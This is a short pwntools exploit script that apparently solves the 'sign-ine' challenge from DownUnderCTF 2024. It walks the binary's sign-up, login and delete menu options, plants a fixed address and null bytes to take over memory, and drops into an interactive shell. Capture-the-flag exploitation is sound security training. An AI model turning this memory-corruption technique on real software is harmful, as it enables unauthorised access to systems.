#!/usr/bin/env python3
from pwn import *
import string

exe = ELF("./sign-ine")
# context.log_level='debug'
context.terminal = ["alacritty","-e"]
if args.REMOTE:
    p = remote("2024.ductf.dev",  30022)
else:
    p = process([exe.path])
    gdb.attach(p,"""
    b*0x40150d
               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
size = 3
sla(b"> ", b"1")
sa(b":",b"aaaa")
sa(b":",b"aaaa")

sla(b"> ", b"1")
sa(b":",b"bbbb")
sa(b":",p64(0x402eb8))

sla(b"> ", b"1")
sa(b":",b"cccc")
sa(b":",b"cccc")

sla(b"> ", b"2")
sa(b":",b"bbbb")
sa(b":",p64(0x402eb8))
sla(b">",b"3")

sla(b"> ", b"1")
sa(b":",b"bbbb")
sa(b":",b"bbbb")

sla(b"> ", b"2")
sa(b":",b"bbbb")
sa(b":",b"bbbb")

sla(b">",b"2")
sa(b":",p8(0))
sa(b":",p8(0))

# sla("> ", "3")

p.interactive()
# good luck pwning :)

